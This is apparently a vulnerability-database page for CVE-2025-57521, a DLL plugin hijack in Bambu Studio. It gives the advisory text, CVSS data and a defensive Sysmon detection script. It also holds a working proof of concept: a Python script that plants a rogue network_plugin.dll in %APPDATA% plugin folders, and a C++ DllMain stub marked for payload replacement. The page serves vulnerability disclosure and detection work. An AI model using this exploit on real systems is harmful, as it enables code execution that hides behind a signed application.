Security Vulnerability Report
CVE-2025-57521 CVSS 6.1 MEDIUM

CVE-2025-57521

Published: 2025-10-21 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

Bambu Studio 2.1.1.52 and earlier is affected by a vulnerability that allows arbitrary code execution during application startup. The application loads a network plugin without validating its digital signature or verifying its authenticity. A local attacker can exploit this behavior by placing a malicious component in the expected location, which is controllable by the attacker (e.g., under %APPDATA%), resulting in code execution within the context of the user. The main application is digitally signed, which may allow a malicious component to inherit trust and evade detection by security solutions that rely on signed parent processes.
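
An added example, not part of the original record and not Bambu Studio code: because the host process is signed, detection has to key on the signature of the loaded module itself. The sketch classifies Sysmon Event ID 7 (image load) records; the sample events are constructed, the directory and file names are the unverified ones used in this page's PoC, and `EXPECTED_SIGNER` is a placeholder.

```python
import ntpath

# Assumption: host process image name, as it appears in this page's PoC paths.
HOST_IMAGE = "bambu-studio.exe"
# Assumption: substrings marking user-writable roots; extend for your estate.
USER_WRITABLE_MARKERS = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\")
# Hypothetical placeholder: the publisher your deployment expects on plugins.
EXPECTED_SIGNER = "EXAMPLE-EXPECTED-PUBLISHER"


def classify(event):
    """Return a finding string for one Sysmon Event ID 7 record, or None."""
    if ntpath.basename(event["Image"]).lower() != HOST_IMAGE:
        return None  # a different process loaded the module
    loaded = event["ImageLoaded"].lower()
    if not any(marker in loaded for marker in USER_WRITABLE_MARKERS):
        return None  # modules from the install directory are out of scope here
    # Judge the module itself; the signed parent process says nothing about it.
    if event.get("Signed", "false").lower() != "true":
        return "unsigned module from user-writable path"
    if event.get("SignatureStatus") != "Valid":
        return "invalid signature on module from user-writable path"
    if event.get("Signature") != EXPECTED_SIGNER:
        return "unexpected signer on module from user-writable path"
    return None


def findings(events):
    """Return (ImageLoaded, reason) for every event that needs triage."""
    return [(e["ImageLoaded"], reason) for e in events if (reason := classify(e))]


# Constructed sample events (not real telemetry).
_HOST = r"C:\Program Files\Bambu Studio\bambu-studio.exe"
_PLUGINS = r"C:\Users\alice\AppData\Roaming\BambuStudio\plugins"
SAMPLE_EVENTS = [
    {"Image": _HOST, "ImageLoaded": _PLUGINS + r"\network_plugin.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
    {"Image": _HOST, "ImageLoaded": _PLUGINS + r"\network_plugin.dll",
     "Signed": "true", "Signature": EXPECTED_SIGNER, "SignatureStatus": "Valid"},
    {"Image": _HOST, "ImageLoaded": _PLUGINS + r"\network_plugin.dll",
     "Signed": "true", "Signature": "Some Other Publisher", "SignatureStatus": "Valid"},
    {"Image": r"C:\Windows\explorer.exe", "ImageLoaded": _PLUGINS + r"\network_plugin.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for path, reason in findings(SAMPLE_EVENTS):
        print(f"{reason}: {path}")
```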

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Bambu Studio <= 2.1.1.52

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57521 PoC - Bambu Studio Malicious Network Plugin DLL
# This PoC demonstrates the concept of placing a malicious DLL
# in the expected plugin location to achieve code execution
import os
import shutil
import subprocess

# Target plugin directory controlled by the attacker (under %APPDATA%)
APPDATA_PATH = os.environ.get('APPDATA', '')
PLUGIN_DIRS = [
    os.path.join(APPDATA_PATH, 'BambuStudio', 'plugins'),
    os.path.join(APPDATA_PATH, 'BambuStudio', 'network'),
    os.path.join(APPDATA_PATH, 'Bambu Lab', 'BambuStudio', 'plugins'),
]

# Expected plugin name that Bambu Studio loads at startup
TARGET_PLUGIN = "network_plugin.dll"
MALICIOUS_PAYLOAD = "malicious_network.dll"


def check_target_installed():
    """Check if vulnerable Bambu Studio is installed"""
    common_paths = [
        r"C:\Program Files\Bambu Studio\bambu-studio.exe",
        r"C:\Program Files (x86)\Bambu Studio\bambu-studio.exe",
        os.path.join(APPDATA_PATH, '..', 'Local', 'Programs', 'bambu-studio', 'bambu-studio.exe'),
    ]
    for path in common_paths:
        if os.path.exists(path):
            print(f"[+] Found Bambu Studio at: {path}")
            return True
    print("[-] Bambu Studio not found in common locations")
    return False


def deploy_malicious_plugin():
    """Deploy malicious DLL to the expected plugin location"""
    for plugin_dir in PLUGIN_DIRS:
        if not os.path.exists(plugin_dir):
            try:
                os.makedirs(plugin_dir, exist_ok=True)
                print(f"[+] Created plugin directory: {plugin_dir}")
            except PermissionError:
                continue
        target_path = os.path.join(plugin_dir, TARGET_PLUGIN)
        try:
            # Copy the malicious DLL to the expected location
            if os.path.exists(MALICIOUS_PAYLOAD):
                shutil.copy2(MALICIOUS_PAYLOAD, target_path)
                print(f"[+] Malicious plugin deployed to: {target_path}")
                return True
            else:
                print(f"[!] Payload {MALICIOUS_PAYLOAD} not found, creating stub")
                with open(target_path, 'wb') as f:
                    f.write(b'MZ\x90\x00')  # PE header stub
                return True
        except PermissionError:
            print(f"[-] Permission denied: {target_path}")
    return False


def trigger_execution():
    """Trigger Bambu Studio startup to load the malicious plugin"""
    bambu_path = r"C:\Program Files\Bambu Studio\bambu-studio.exe"
    if os.path.exists(bambu_path):
        print(f"[*] Launching Bambu Studio to trigger DLL loading...")
        subprocess.Popen([bambu_path])
        print("[+] Bambu Studio launched, malicious plugin should execute")
    else:
        print("[-] Bambu Studio executable not found")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-57521 - Bambu Studio Plugin Hijacking PoC")
    print("=" * 60)
    if check_target_installed():
        if deploy_malicious_plugin():
            print("\n[*] Malicious plugin is in place.")
            print("[*] Waiting for user to launch Bambu Studio...")
            # Uncomment to auto-trigger:
            # trigger_execution()
    else:
        print("[-] Target application not found. Exiting.")

cpp
// --- Malicious DLL (C++) that gets executed when loaded ---
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    switch (reason) {
    case DLL_PROCESS_ATTACH:
        // Disable file system redirection for WOW64
        PVOID oldValue;
        Wow64DisableWow64FsRedirection(&oldValue);
        // Execute malicious payload in context of Bambu Studio
        system("calc.exe"); // Replace with actual payload
        Wow64RevertWow64FsRedirection(oldValue);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57521", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:38.960", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bambu Studio 2.1.1.52 and earlier is affected by a vulnerability that allows arbitrary code execution during application startup. The application loads a network plugin without validating its digital signature or verifying its authenticity. A local attacker can exploit this behavior by placing a malicious component in the expected location, which is controllable by the attacker (e.g., under %APPDATA%), resulting in code execution within the context of the user. The main application is digitally signed, which may allow a malicious component to inherit trust and evade detection by security solutions that rely on signed parent processes."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/bambulab/BambuStudio/issues/7405", "source": "[email protected]"}, {"url": "https://github.com/piuppi/Proof-of-Concepts/blob/main/Bambu%20Lab/Bambu%20Studio/README.md", "source": "[email protected]"}, {"url": "https://wiki.bambulab.com/en/software/bambu-studio/release/release-note-2-3-0", "source": "[email protected]"}]}}